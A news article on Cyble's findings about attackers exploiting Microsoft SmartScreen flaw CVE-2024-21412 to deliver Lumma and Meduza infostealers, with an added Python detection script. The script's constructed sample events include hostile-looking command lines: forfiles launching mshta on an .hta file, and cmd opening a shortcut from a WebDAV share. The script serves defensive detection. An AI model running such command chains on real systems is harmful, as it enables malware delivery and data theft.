CyberSecurity SEE

Cyble Researchers Discover Threat Actors Exploiting Microsoft SmartScreen Vulnerability

Cyble Research and Intelligence Labs (CRIL) researchers have recently discovered a concerning trend in the cybersecurity realm. An active campaign has been uncovered in which threat actors exploit a Microsoft SmartScreen vulnerability to deliver infostealers onto users' machines. This vulnerability, tracked as CVE-2024-21412, was disclosed by Microsoft in February and added to CISA's Known Exploited Vulnerabilities catalog. Although a patch is available, deployment appears to be limited, as the campaign continues to target users in various regions, including Spain, the U.S., and Australia.

In addition to CVE-2024-21412, another SmartScreen vulnerability (CVE-2024-29988) was patched by Microsoft in April. This continuous exploitation of vulnerabilities highlights the evolving nature of cybersecurity threats and the need for constant vigilance.

The campaign begins with phishing lures related to healthcare insurance schemes, transportation notices, and tax-related communications. These emails contain links that redirect users to WebDAV shares via a search protocol handler, deceiving them into executing a malicious internet shortcut file. The multi-stage attack that follows abuses legitimate tools such as forfiles.exe, PowerShell, and mshta to evade security controls and inject the payload into explorer.exe, ultimately delivering the Lumma and Meduza stealers.

Earlier in January, the Zero Day Initiative (ZDI) discovered a sophisticated DarkGate campaign that exploited the CVE-2024-21412 vulnerability through fake software installers. Another group, Water Hydra, has been leveraging the same vulnerability in a targeted campaign against financial market traders, deploying the DarkMe remote access trojan (RAT).

The recent surge in the exploitation of CVE-2024-21412, coupled with the adoption of advanced techniques like DLL sideloading and IDATLoader combinations, underscores the evolving and dangerous threat landscape faced by cybersecurity professionals. Cyber threats are becoming increasingly dynamic, with the potential for more sophisticated attacks.

The Cyble researchers highlighted the importance of implementing robust cybersecurity controls to combat these threats effectively. They recommended utilizing advanced email filtering solutions, monitoring and restricting the forfiles utility, implementing application whitelisting, and employing network segmentation to protect critical workloads and prevent the spread of malware within an organization.
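One way to put the forfiles monitoring recommendation into practice, as an added example that is not part of Cyble's report or this article: a Python check over process-creation events (Sysmon-style field names ParentImage, Image and CommandLine are assumed; the events below are constructed, not real telemetry) that flags forfiles.exe acting as a launcher for PowerShell or mshta, and executables or arguments that point at a WebDAV share.

```python
"""Flag process-creation events matching the forfiles -> PowerShell/mshta chain."""
import ntpath
import re

# Script hosts named in the reported chain that forfiles.exe should not be launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Windows WebDAV UNC paths carry a DavWWWRoot component, e.g. \\host@SSL\DavWWWRoot\...
WEBDAV_RE = re.compile(r"\\\\[^\\]+\\davwwwroot\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def check_event(event: dict) -> list[str]:
    """Return the reasons an event is suspicious (empty list if it looks benign)."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    if parent == "forfiles.exe" and image in SCRIPT_HOSTS:
        reasons.append(f"forfiles.exe spawned {image}")
    if image == "forfiles.exe" and any(h[:-4] in cmdline.lower() for h in SCRIPT_HOSTS):
        reasons.append("forfiles.exe invoked with a script-host command")
    if WEBDAV_RE.search(cmdline) or WEBDAV_RE.search(event.get("Image", "")):
        reasons.append("binary or argument loaded from a WebDAV share")
    return reasons


def suspicious_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that trips at least one check."""
    return [(i, check_event(e)) for i, e in enumerate(events) if check_event(e)]


# Constructed sample events: a forfiles-driven mshta launch, its child process,
# a legitimate log-cleanup use of forfiles, and a shortcut opened from a WebDAV share.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r'forfiles /p C:\Windows /m notepad.exe /c "mshta C:\Users\Public\notice.hta"'},
    {"ParentImage": r"C:\Windows\System32\forfiles.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta C:\Users\Public\notice.hta"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r'forfiles /p C:\logs /s /m *.log /d -30 /c "cmd /c del @path"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "\\203.0.113.5@SSL\DavWWWRoot\docs\notice.url"'},
]

if __name__ == "__main__":
    for index, reasons in suspicious_events(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```

The second check catches the case where forfiles itself is the only process created so far, so the alert fires before the script host starts.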

As cyber threats continue to evolve, it is crucial for organizations to stay vigilant and implement comprehensive cybersecurity measures to safeguard their systems and data. By being proactive and prepared, they can mitigate the risks posed by sophisticated cyber attacks and protect themselves from potential breaches and data loss.
